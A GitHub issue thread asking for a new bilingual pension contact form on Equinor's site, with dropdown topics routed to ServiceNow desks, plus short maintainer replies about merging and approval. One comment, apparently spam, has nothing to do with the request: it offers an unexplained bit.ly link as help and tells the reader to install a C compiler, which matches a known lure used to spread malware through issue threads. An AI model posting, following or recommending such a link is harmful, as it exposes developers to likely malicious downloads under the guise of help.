### ISSUE TITLE
Create a new contact form for Equinor pension

### ISSUE THREAD

**Issue by meols** [equinor/energyvision#2528]
Please create a new form, based on the Contact us form, to add to this page: https://www.equinor.com/about-us/equinor-pension
 
 English form:
 <img width="679" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBL1BvQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--2c7747b77d0ae14dcf89eec93a2affe3eec7ad7d/image.png" alt="image.png" />

«Select topic» (as written in the form in the screen shot, with the following drop-down menu)
“Pension related”
“Travel Insurance”
“Other pension or insurance related questions”
 
Requests should be routed to ServiceNow ( S@E):
1.	“Pension related” to go to CI: Servicedesk Pension
2.	“Travel Insurance” to go to CI: ServiceDesk Insurance
3.	“Other pension or insurance related questions” ” to go to CI: ServiceDesk PO
 
Norwegian form:
<img width="743" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBL0xvQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--3d37fdbe7179b00ded92e270cb1e946552d9770e/image.png" alt="image.png" />
 
Kategori
«Velg tema»  (as written in the form in the screen shot, with the following drop-down menu)
 
“Pensjon spørsmål”
“Reiseforsikring for pensjonister”
“Andre pensjons- eller forsikringsspørsmål”
 
Requests should be routed to ServiceNow ( S@E): 
1.	“Pensjon spørsmål” to go to CI: Servicedesk Pension
2.	“Reiseforsikring for pensjonister” to go to CI: ServiceDesk Insurance
3.	“Andre pensjons- eller forsikringsspørsmål” to go to CI: ServiceDesk PO

**Comment by aroopcodder** [comment]
maybe this will help
https://bit.ly/4gx42eQ

you may need to install the c compiler

**Comment by padms** [comment]
We shall merge this to main after merging #2505

**Comment by meols** [comment]
Thanks - approved :thumbsup:
